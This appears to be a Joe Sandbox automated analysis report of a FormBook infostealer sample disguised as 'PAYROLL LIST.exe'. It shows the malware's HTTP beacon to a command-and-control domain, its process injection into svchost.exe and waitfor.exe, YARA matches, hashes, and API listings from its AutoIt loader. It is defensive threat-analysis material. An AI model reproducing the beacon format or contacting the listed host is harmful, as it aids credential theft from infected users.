ftMDw=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/AAYqxLSpDDR4tJQMari8ojaxRSGKh9MBeHMhAYKL13YI1o9VgDyYPnRb0VXcPnte0TumqORdQOit6p5waLGr5kvhNl8pjVjgMZlcsk6ibr5F0VyrBhjAQtjkdjkifBWrIljQnAeudpuqvHL5cA53zW6llv6GbTJcnvhV3MvZf58yzHFC9RUokHpQwePn2QNOuTIyigPiercDRGv1I8Y4WZkIt+AhwSaSnoeJkwHegsMJJFxorEEdP3GFugZKCOorYzlKfg52uW9pFg1lehd87Pm1ulu2q2jU/1tUnov6HCnGwhet/Uws7nbv6a6QyGKIRtrXgcFWKwY5xpWZGhBfwszfuox+dKb9+AJ37MxFjAF1fTBNHKMGuwsl2qmKFQOqHD2PS6pSbeYZsI0QPJ3zkbS7V4dT08WicWIj5N/64aNfRbvoZXTFbjNBZZ6K8M/JF9/jwbyx0694plkwA9WnOWhAo8jAnzcpUKEwN3rqi1eQZe5zsPS8wvpFHT/kCBpPdk7DmjfdrN8/y2Jz5W5EHNM8WUiaXC7Y+7FgxzAiWk061ew6ek4ivqEHvNSVOFCf/hFvBEfxY5vzBLNgQoxp+BOzcxXSRLYOdV3hEyXPNzlCfS0ssnor3FKKTHqDmh23DU991Oc5ygK1cqyRUM3+xf7Qn1tNNoOT7JX+2tpR2/LWD9nXZtT5VZHI4O480rem0sR9soAjiqet2pgX/N3aglGAvt40MTeRa1evVgvKRr51prb7LOBBQaCKDPpkYmI/EmQOkiED7+ja31EqOmFgC4zmgdT20RK5mFNIv+Kg4EcoNbecEpj5TBdA93s/x6WZ9JU2KEL9cfYAXxWy+udEEneSoqqqh5rYIwV4R8VkVt2OpLimO/5TA6whQpx7vjsR0uzWvCQQJzRAzTl6aGyJAV2nibn0yhHCb+wG5rLWK1i+nH4ui/VV/FA6MFPNJe3TiOzPt [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50028	104.21.40.167	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:53.636650085 CET	516	OUT	GET /swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTeUs9QjKFG8O2A2x2bIvsQFy4qdLsSxXEiZwT1ITG2O8o4PgX9ko=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.zkdamdjj.shop User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:31:55.587796926 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 24 Nov 2024 07:31:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTeUs9QjKFG8O2A2x2bIvsQFy4qdLsSxXEiZwT1ITG2O8o4PgX9ko=&s8q=0RJLtN5PAfjxwlrp x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.9b9a69d1fac6b11918e507384a598f21,02a_ x-litespeed-cache: miss cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZGo3ED4VdsQaZBVJW%2F25YramF%2FlO6wOjGc%2FV%2BF%2FeqFcfFlkm6L7DpGpQRAotX5m2TISlC5XVQhrARzomQqC5XIV%2BbI88wb6FuBsALO7RLUN4t%2FzbD5lhxP1SDCnz1JUMmF1Uw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e77b3ba2fd0c439-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=205&unsent_byte Data Raw: Data Ascii:
Nov 24, 2024 08:31:55.587873936 CET	42	IN	Data Raw: 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: =0&cid=0000000000000000&ts=0&x=0"0

Target ID:	0
Start time:	02:27:46
Start date:	24/11/2024
Path:	C:\Users\user\Desktop\PAYROLL LIST.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYROLL LIST.exe"
Imagebase:	0xa20000
File size:	1'214'464 bytes
MD5 hash:	E51F8D1FC9FD9B75C5F7BAFE9B666C22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:27:48
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAYROLL LIST.exe"
Imagebase:	0xef0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:28:09
Start date:	24/11/2024
Path:	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe"
Imagebase:	0x490000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:28:10
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\waitfor.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\waitfor.exe"
Imagebase:	0x10000
File size:	32'768 bytes
MD5 hash:	E58E152B44F20DD099C5105DE482DF24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:28:23
Start date:	24/11/2024
Path:	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe"
Imagebase:	0x490000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	02:28:36
Start date:	24/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	4.6%
Total number of Nodes:	1865
Total number of Limit Nodes:	166

Executed Functions

Function 00A4B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b0be81e4b9099af74f68cb27f8f3d2df0a3bfdabbad297ff49bee2889fdb6f
Instruction ID: fcf31c90d5495066a65c770b5d7c6d2febeaaf3d5f058a8d82f95e50184127c2
Opcode Fuzzy Hash: 22b0be81e4b9099af74f68cb27f8f3d2df0a3bfdabbad297ff49bee2889fdb6f
Instruction Fuzzy Hash: 34325E79B122688FCB24CF54DD816E9B7B5FF86310F1841D9E40AA7A91D7309E81CF62

Function 00A23D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00A23AA3,?), ref: 00A23D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00A23AA3,?), ref: 00A23D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE1148,00AE1130,?,?,?,?,00A23AA3,?), ref: 00A23DC8

Part of subcall function 00A26430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A23DEE,00AE1148,?,?,?,?,?,00A23AA3,?), ref: 00A26471

SetCurrentDirectoryW.KERNEL32(?,?,?,00A23AA3,?), ref: 00A23E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AD28F4,00000010), ref: 00A91CCE
SetCurrentDirectoryW.KERNEL32(?,00AE1148,?,?,?,?,?,00A23AA3,?), ref: 00A91D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00ABDAB4,00AE1148,?,?,?,?,?,00A23AA3,?), ref: 00A91D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00A23AA3), ref: 00A91D90

Part of subcall function 00A23E6E: GetSysColorBrush.USER32(0000000F), ref: 00A23E79
Part of subcall function 00A23E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00A23E88
Part of subcall function 00A23E6E: LoadIconW.USER32(00000063), ref: 00A23E9E
Part of subcall function 00A23E6E: LoadIconW.USER32(000000A4), ref: 00A23EB0
Part of subcall function 00A23E6E: LoadIconW.USER32(000000A2), ref: 00A23EC2
Part of subcall function 00A23E6E: RegisterClassExW.USER32(?), ref: 00A23F30

Part of subcall function 00A236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A236E6
Part of subcall function 00A236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23707
Part of subcall function 00A236B8: ShowWindow.USER32(00000000,?,?,?,?,00A23AA3,?), ref: 00A2371B
Part of subcall function 00A236B8: ShowWindow.USER32(00000000,?,?,?,?,00A23AA3,?), ref: 00A23724

Part of subcall function 00A24FFC: _memset.LIBCMT ref: 00A25022
Part of subcall function 00A24FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A250CB

Strings

runas, xrefs: 00A91D84
This is a third-party compiled AutoIt script., xrefs: 00A91CC8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 6c0a37f6c30946b1f28b35835b1c12656ff70271d474d78179417634f1b9584b
Instruction ID: 28515d1e2bc1d093cd165cb97b8c3fb95f408e656cf486d4b698931985609239
Opcode Fuzzy Hash: 6c0a37f6c30946b1f28b35835b1c12656ff70271d474d78179417634f1b9584b
Instruction Fuzzy Hash: 34510931E042A5BECF11EBF8ED85EED7BB9AB16700F004179F5426A192DB74464ACB21

Function 00A3DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A3DDEC
GetCurrentProcess.KERNEL32(00000000,00ABDC38,?,?), ref: 00A3DEAC
GetNativeSystemInfo.KERNELBASE(?,00ABDC38,?,?), ref: 00A3DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A3DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A3DF1F
GetSystemInfo.KERNEL32(?,00ABDC38,?,?), ref: 00A3DF29
GetSystemInfo.KERNEL32(?,00ABDC38,?,?), ref: 00A3DF35

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 8ac754807011e48c6001d49017a5fb9a6dd3687a50480fe8cc632913ee9a97b9
Instruction ID: 3bc8a191432c75e80e729522561b89c394fc4452d994fa9f7d204a2c8d02941b
Opcode Fuzzy Hash: 8ac754807011e48c6001d49017a5fb9a6dd3687a50480fe8cc632913ee9a97b9
Instruction Fuzzy Hash: CA6192B190A284DBCF15CF68A8C15E97FB46F6A300F2949D9E8459F247C634CA09CB65

Function 00A2406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A2449E,?,?,00000000,00000001), ref: 00A2407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A2449E,?,?,00000000,00000001), ref: 00A24092
LoadResource.KERNEL32(?,00000000,?,?,00A2449E,?,?,00000000,00000001,?,?,?,?,?,?,00A241FB), ref: 00A94F1A
SizeofResource.KERNEL32(?,00000000,?,?,00A2449E,?,?,00000000,00000001,?,?,?,?,?,?,00A241FB), ref: 00A94F2F
LockResource.KERNEL32(00A2449E,?,?,00A2449E,?,?,00000000,00000001,?,?,?,?,?,?,00A241FB,00000000), ref: 00A94F42

Strings

SCRIPT, xrefs: 00A24088

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f296526a24c67080c3bba95ce8825691986b1c26287c58bfd4c3e5939cf58970
Instruction ID: 3098b7856a8cf3babd723bea61d54868d6261fb1d8e66390d0a25b7dae8a8614
Opcode Fuzzy Hash: f296526a24c67080c3bba95ce8825691986b1c26287c58bfd4c3e5939cf58970
Instruction Fuzzy Hash: 62117070204711BFE7258B69EC48F677BB9EBC9B51F20412CF6428A690DB71DC41CA20

Function 00A66CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00A92F49), ref: 00A66CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00A66CCA
FindClose.KERNEL32(00000000), ref: 00A66CDA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: ab07b38162d2b5bc078384fa8f0b93ba57abae4c21dde3eda4a67ac797a3209b
Instruction ID: a8f0583b7147ef9e82167decca4d1710b1552cd0c7f2f8d7d23d67ad9a297e51
Opcode Fuzzy Hash: ab07b38162d2b5bc078384fa8f0b93ba57abae4c21dde3eda4a67ac797a3209b
Instruction Fuzzy Hash: 79E04F31814916ABC320A778EC0D8EA77BCEA0A339F104716F9B6C25E0EB70DD5586D6

Function 00A2E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2E959
timeGetTime.WINMM ref: 00A2EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2ED2E
TranslateMessage.USER32(?), ref: 00A2ED3F
DispatchMessageW.USER32(?), ref: 00A2ED4A
LockWindowUpdate.USER32(00000000), ref: 00A2ED79
DestroyWindow.USER32 ref: 00A2ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A2ED9F
Sleep.KERNEL32(0000000A), ref: 00A95270
TranslateMessage.USER32(?), ref: 00A959F7
DispatchMessageW.USER32(?), ref: 00A95A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A95A19

Strings

@GUI_WINHANDLE, xrefs: 00A95360
@GUI_CTRLID, xrefs: 00A95314
@GUI_CTRLHANDLE, xrefs: 00A953AC
@TRAY_ID, xrefs: 00A954C9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 73e6f5541dfcd08f665c5c45e727d6f3d446e2970fbeab138d157bc5d5e47027
Instruction ID: 91ef221c1351da315e6a603e034c38fe10ba3129cdec17522e22b84e209aa2c8
Opcode Fuzzy Hash: 73e6f5541dfcd08f665c5c45e727d6f3d446e2970fbeab138d157bc5d5e47027
Instruction Fuzzy Hash: 2B621670608390DFDB25DF68D985BAA77E4BF44304F08497DF9868B292DB70D889CB52

Function 00A55C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00A55EC3
___createFile.LIBCMT ref: 00A55F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00A55F2D
__dosmaperr.LIBCMT ref: 00A55F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00A55F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00A55F6A
__dosmaperr.LIBCMT ref: 00A55F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00A55F7C
__set_osfhnd.LIBCMT ref: 00A55FAC
__lseeki64_nolock.LIBCMT ref: 00A56016
__close_nolock.LIBCMT ref: 00A5603C
__chsize_nolock.LIBCMT ref: 00A5606C
__lseeki64_nolock.LIBCMT ref: 00A5607E
__lseeki64_nolock.LIBCMT ref: 00A56176
__lseeki64_nolock.LIBCMT ref: 00A5618B
__close_nolock.LIBCMT ref: 00A561EB

Part of subcall function 00A4EA9C: CloseHandle.KERNELBASE(00000000,00ACEEF4,00000000,?,00A56041,00ACEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A4EAEC
Part of subcall function 00A4EA9C: GetLastError.KERNEL32(?,00A56041,00ACEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A4EAF6
Part of subcall function 00A4EA9C: __free_osfhnd.LIBCMT ref: 00A4EB03
Part of subcall function 00A4EA9C: __dosmaperr.LIBCMT ref: 00A4EB25

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

__lseeki64_nolock.LIBCMT ref: 00A5620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00A56342
___createFile.LIBCMT ref: 00A56361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00A5636E
__dosmaperr.LIBCMT ref: 00A56375
__free_osfhnd.LIBCMT ref: 00A56395
__invoke_watson.LIBCMT ref: 00A563C3
__wsopen_helper.LIBCMT ref: 00A563DD

Strings

@, xrefs: 00A55F98

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: acd553e8bad2c2ca92cb377b7db01524fb1f5857d71a001bb4d7f76a238d553a
Instruction ID: e7407a330223d1c5251f1779814dcc3d7873096ba005bc78ef8dafce47448897
Opcode Fuzzy Hash: acd553e8bad2c2ca92cb377b7db01524fb1f5857d71a001bb4d7f76a238d553a
Instruction Fuzzy Hash: 8F221472D006069BEB299FA8DC95BFD7B71FB50322F644228ED119B2E2C7358D48C791

Function 00A6FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00A6FA96
_wcschr.LIBCMT ref: 00A6FAA4
_wcscpy.LIBCMT ref: 00A6FABB
_wcscat.LIBCMT ref: 00A6FACA
_wcscat.LIBCMT ref: 00A6FAE8
_wcscpy.LIBCMT ref: 00A6FB09
__wsplitpath.LIBCMT ref: 00A6FBE6
_wcscpy.LIBCMT ref: 00A6FC0B
_wcscpy.LIBCMT ref: 00A6FC1D
_wcscpy.LIBCMT ref: 00A6FC32
_wcscat.LIBCMT ref: 00A6FC47
_wcscat.LIBCMT ref: 00A6FC59
_wcscat.LIBCMT ref: 00A6FC6E

Part of subcall function 00A6BFA4: _wcscmp.LIBCMT ref: 00A6C03E
Part of subcall function 00A6BFA4: __wsplitpath.LIBCMT ref: 00A6C083
Part of subcall function 00A6BFA4: _wcscpy.LIBCMT ref: 00A6C096
Part of subcall function 00A6BFA4: _wcscat.LIBCMT ref: 00A6C0A9
Part of subcall function 00A6BFA4: __wsplitpath.LIBCMT ref: 00A6C0CE
Part of subcall function 00A6BFA4: _wcscat.LIBCMT ref: 00A6C0E4
Part of subcall function 00A6BFA4: _wcscat.LIBCMT ref: 00A6C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A6FA61

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: eada94ea6c3e54e3d8e9ad830cee1280d7c9d4d666d5d61708f6bb463c3a8393
Instruction ID: 759942e7670b68096d5f1c82e84e4d45e391c17a4bcbdbf3be438e6dc12ca9f5
Opcode Fuzzy Hash: eada94ea6c3e54e3d8e9ad830cee1280d7c9d4d666d5d61708f6bb463c3a8393
